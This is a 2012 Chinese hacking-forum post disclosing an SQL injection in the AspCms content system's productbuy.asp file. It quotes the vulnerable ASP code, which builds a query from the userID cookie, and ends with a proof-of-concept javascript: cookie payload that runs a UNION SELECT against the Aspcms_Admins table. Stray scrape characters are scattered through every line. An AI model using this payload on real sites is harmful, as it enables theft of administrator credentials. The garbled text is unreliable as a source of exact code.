好久没上土司了,上来一看发现在删号名单内.....
8 X; u. l* Q# S也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。5 R" S k# q) |; g( U3 c
废话不多说,看代码:
/ D# W" E" s+ W8 o9 X8 j: d" i7 K
<%
9 U0 {+ x. I: T9 A" C n F5 I1 ^/ ^
if action = "buy" then
3 |, \6 W) U. `$ e9 i5 D* G% r) s. c3 y( y% g# f
addOrder()" m5 u- Y. l% |2 D; z2 G" Q
# I F$ r- A" g8 `! celse; |! i1 g7 f! x
, I$ l& }; a" b: Y/ [
echoContent()$ i1 Q. F# n" Z L
Y5 Y5 u, ~( ]end if) }2 I! N( F& M2 X6 p" L6 c
( C6 a4 b* t. L& U5 n1 R3 X
) {9 \, a% g b2 C6 Z3 B3 d
; [$ U+ k( t# o9 n0 E2 O0 ^……略过
6 R0 e2 ]1 Z* ~, a' B) L' L
8 X" g: J+ |1 X& [& ?
4 v- ~( y* F0 ~) a: F8 k1 I$ j0 x$ J4 k& u. E3 O m1 u, {" `# [
Sub echoContent()
/ D# Z3 o! h- L* M0 F( ?- k9 U6 ]& A/ m5 V! j# k ]: d* J \$ i; ~! y
dim id
8 V' b" E/ Z: t, k8 ^9 q1 q0 z8 Q5 K
id=getForm("id","get")
4 m9 J( p' {9 W! M8 l
( s1 S3 |4 e4 e4 T( `8 d, Z+ B - H" Z9 H/ _& E6 M7 t% j5 w* {9 R
4 z. k' r2 P' u% \; m4 J; e( r
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" 6 d# F! ?; j4 e5 v' }7 Q8 p8 C! Y/ V
' f) \# b. _: _* n4 Z H# z B* U
$ T* _" m3 F' F5 e5 P
- j) w/ c# {3 I z0 ^/ ~
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")# n! k5 E, e( N) a2 L; x9 [' e
0 f: n3 d0 c# {& c. N dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
4 C% k" n; l. v, S3 D8 l/ x* p/ { l3 Z# t: V$ F$ t
Dim templatePath,tempStr
' F2 y. S4 l/ m( T
1 Q0 O, ~. V6 `$ i4 N templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"" T% A" @- k8 j g5 f1 x& w
2 ^$ W3 [& E3 E8 C9 R1 W
5 P: U* @' q; }0 {
# ]3 L9 y% o4 v7 e: v set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
/ l$ M# v- { i, E. f" Y. Z, R
0 a! e' A. n# s. P; }1 t selectproduct=rsObj(0)3 I2 o! W, o$ m* i- p1 W$ e
7 @" k/ d8 h/ j$ t
, O( q9 s5 `9 E
$ w9 U' h& t& n" Y7 e Dim linkman,gender,phone,mobile,email,qq,address,postcode
# w E' N) C( t8 |, u" t* O' |% G
: F0 P* T. O% ]+ x* o2 ^6 H! i: }/ _ a if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0. T0 U- F5 i. }1 @9 Z
+ v/ I5 ]8 A, f* O" E/ H5 s
if rCookie("loginstatus")=1 then ! Q u4 g2 J4 t
( f" m& l% M- G' z; E
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")# J6 y% ]+ `9 `8 e* x& g% h3 m3 ^
; _" T8 E/ g6 _5 Z& ]* i
linkman=rsObj("truename")
6 t9 E* |% u% X# T8 i0 @9 C# ]6 W6 s3 [4 W, I/ a9 K# T: |
gender=rsObj("gender")- J' n3 g4 M; l4 r* V& s) ]" y+ p
1 P9 I! I8 H% Q! n
phone=rsObj("phone")* @5 `2 {% f- h0 T5 s
% y# p' t' X( }, E9 t mobile=rsObj("mobile")
, U/ B- P) u6 r! O
! `# d4 n/ P' y7 |5 ~ email=rsObj("email")7 j& u4 N" c' f9 a' L* A
) Y q2 C% u+ w$ D6 C& Y qq=rsObj("qq")2 e \5 r- P) X" z8 g% j& }% k
: }' I9 I6 i7 [# a address=rsObj("address")
0 L- a( g9 { C1 ^+ v* S4 d- X
postcode=rsObj("postcode")
: j% `! Z0 m5 @# p) L8 ~" M4 e7 {7 { S9 j8 A
else
/ |7 v& e0 g2 Y$ N5 |+ i+ ]: h- Y1 ^- H: a
gender=1
8 ~! L7 O1 C8 D8 N9 s: C; f# m! X
end if
) u O! t2 O4 G+ Y0 L$ H; C
4 U# u0 O, M9 _# N2 \! u, ] rsObj.close()' o, \- y( w- h9 ~# _, Q$ s+ w
9 C, A0 j- g: b 6 ^8 t% S( f7 O( r6 X
* \# ?7 n! s, y) O
with templateObj
; j2 C) [! H7 @- ^: S' C' V3 d; L, o; F @2 D. r
.content=loadFile(templatePath) & k# ]3 X7 |1 k
) V1 v1 v8 C, C0 X! j2 F
.parseHtml()) t6 ~4 K( ?' P& a* d6 [: ?
$ C' H0 i% O1 i2 A/ W7 o
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
( Y8 d9 S% \, c O" R2 ]0 X1 y Q. j; r. E7 D( B. N! w; ^
.content=replaceStr(.content,"[aspcms:linkman]",linkman)
2 S9 ?6 U: S0 h, t+ B
9 I+ d6 d' A; ~" \6 J" M .content=replaceStr(.content,"[aspcms:gender]",gender)
/ e2 T9 z( y; B3 N9 c" ^5 q3 i; x( q" o X. A2 s+ {
.content=replaceStr(.content,"[aspcms:phone]",phone)
- {+ ~& Z& ]- ^- g4 D: h4 j/ I* t: ?2 V8 W; U- N
.content=replaceStr(.content,"[aspcms:mobile]",mobile)
- w; O5 x6 o, M& v" k) @+ [/ C Z$ N) ?- L9 G
.content=replaceStr(.content,"[aspcms:email]",email)
! R3 l% ]; {- i2 t- N+ q: `0 l. p$ P9 A5 x1 P( o
.content=replaceStr(.content,"[aspcms:qq]",qq)
2 s6 O* E( S0 p- ? r* K$ `/ [
$ P. f( \/ W* p; ]/ c# I7 D! h: g .content=replaceStr(.content,"[aspcms:address]",address) : I* ^2 ~) u; p+ I! f; r
- g: w' z9 U# G0 B .content=replaceStr(.content,"[aspcms:postcode]",postcode)
( h0 s: j) a% A4 v x8 [+ y. \% @ E6 D- J- H p
.parseCommon()
! G/ \: O2 d" K9 w6 T6 \
: K2 M. f! X, P/ ? echo .content
* b! F) I _1 E" r" x# i* s# [/ ?' ^0 b
end with
# B0 Z! h+ ?+ z/ S I
d+ k3 l u2 I. `2 I set templateobj =nothing : terminateAllObjects+ O8 C6 n$ w0 D8 O
) L0 _3 L) P a9 |! |" IEnd Sub; t ~2 A) ^# Q/ o) E
漏洞很明显,没啥好说的6 V' @, m9 ] A: q& c+ u
poc:
6 V4 t6 x7 ~: T+ T0 m: p+ B7 @
% p, s/ I9 \( X8 F! e2 Qjavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子$ l; @: P% o x, R# M/ f
; f9 n+ w) s+ ~. Q9 Z
|
发表于 2012-12-27 08:35:05
收藏
支持
反对